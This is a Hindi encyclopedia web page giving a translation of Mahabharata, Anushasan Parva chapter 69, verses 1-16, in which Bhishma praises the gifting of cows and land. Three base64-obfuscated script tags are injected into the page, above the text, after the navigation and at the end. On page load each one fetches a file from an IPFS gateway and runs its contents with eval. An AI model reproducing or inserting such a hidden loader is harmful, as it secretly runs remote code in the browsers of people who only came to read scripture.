महाभारत अनुशासन पर्व अध्याय 69 श्लोक 1-16

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

एकोनसप्ततितम (69) अध्‍याय: अनुशासन पर्व (दानधर्म पर्व)

महाभारत: अनुशासन पर्व: एकोनसप्ततितम अध्याय: श्लोक 1-16 का हिन्दी अनुवाद

गोदानकी महिमा तथा गौओं और ब्राह्माणों की रक्षा से पुण्‍य की प्राप्ति

युधिष्ठिर ने कहा- महाप्रज्ञ कुरूश्रेष्ठ। आप दान की उत्तम विधि का फिर से वर्णन कीजिये। विशेषतः भूमिदान का महत्व बताइये। केवल क्षत्रिय राजा ही यज्ञ करने वाले ब्राह्माण को पृथ्वी का दान कर सकता है और उसी से ब्राह्माण विधि पूर्वक भूमि का प्रतिग्रह ले सकता है। दूसरा कोई यह दान नहीं कर सकता। दान के फल की इच्छा रखने वाले सभी वर्णों के लोग जो दान कर सके तथा वेद में जिस दान का वर्णन हो, उसकी मेरे समक्ष व्याख्या कीजिये। भीष्मजी बोले- युधिष्ठिर । गाय भूमि और सरस्वती- ये तीनों नाम वाली हैं- इन तीनों वस्तुओं का दान करना चाहिए। ये तीनों वस्तऐं मनुष्यों की सम्पूर्ण कामनाऐं पूर्ण करने वाली है। जो ब्राह्माण हमारे शिष्य को धर्मानुकूल ब्राम्ही सरस्वती (वेदवानी) का उपदेश करता है, वह भूमिदान तथा गौदान के समान फल का भागी होता है। इस प्रकार गोदान की प्रशंसा की गई है। उससे बढकर कोई दान नहीं है। युधिष्ठिर । गोदान का फल निकट भविष्य में मिलता है तथा वे गौऐं शीघ्र अभीष्ट अर्थ की सिद्वि करती हैं। गौऐं सम्पूर्ण प्राणियों की माताऐं कहलाती हैं। वे सब को सुख देने वाली हैं। जो अपने अभ्युदय की इच्छा रखता हो, उसे गौओं को सदा दाहिने करके चलना चाहिये। गौआों को लात न मारे। उनके बीच से होकर न निकलें। वे मंगल की आधारभूत देवियां है, अतः उनकी सदा ही पूजा करनी चाहिये। देवताओं ने भी यज्ञ के लिये भूमि जोतते समय बैलों को डंडे आदि से हांका था। अतः पहले यज्ञ के लिये बैलों को जोतना या हांकना श्रेयस्कर माना गया है। उससे भिन्न कर्म के लिये बैलों को जोतना या डंडे आदि से हांकना निन्दनीय है। विद्वान पुरूष को चाहिये कि जब गौऐं स्वछन्दता पूर्वक विचर रही हों अथवा किसी उपद्रव शून्य स्थान में बैठी हों तो उन्हें उद्वेग में न डालें। जब गौऐं प्यास से पीड़ित हों जल की इच्छा से अपने स्वामी की ओर देखती हैं (और वह उन्हें पानी नहीं पिलाता है) तब वे दोषपूर्ण दृष्टि से बन्धू-वान्धवों सहित उसका नाश कर देती हैं। जिनके गोबर से लीपने से देवताओं के मन्दिर और पितरों के श्राद्ध स्थान पवित्र होते हैं, उनसे बढ़कर पावन और क्या हो सकता है? एक वर्ष तक प्रतिदिन स्‍वयं भोजन से पहले दूसरे की गाय को एक मुट्ठी घास खिलाता है, उसका वह व्रत समस्त कामनाओं का पूर्ण करने वाला होता है। वह अपने लिये पुत्र, यश, धन और सम्पत्ति प्राप्त करता है तथा अशुभ कर्म और दुःस्वप्न का नाश कर देता है। युधिष्ठिर ने पूछा- पितामह। किन लक्षणों वाली गौओं का दान करना चाहिये और किन का दान नहीं करना चाहिये? कैसे ब्राह्माण को गाय देनी चाहिये और कैसे ब्राह्माण को गाय नहीं देनी चाहिये? । भीष्मजी ने कहा- राजन। दुराचरी, पापी, लोभी, असत्यवादी तथा देवयज्ञ और श्राद्ध कर्म न करने वाले ब्राह्माण को किसी तरह गौ नहीं देनी चाहिये। जिसके बहुत से पुत्र हों, जो क्षत्रिय और अग्निहोत्री ब्राह्माण हो और गौओं के लिये याचना कर रहा हो, ऐसे पुरूष को दस गौओं का दान करना वाला दाता उत्तम लोकों को पाता है।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>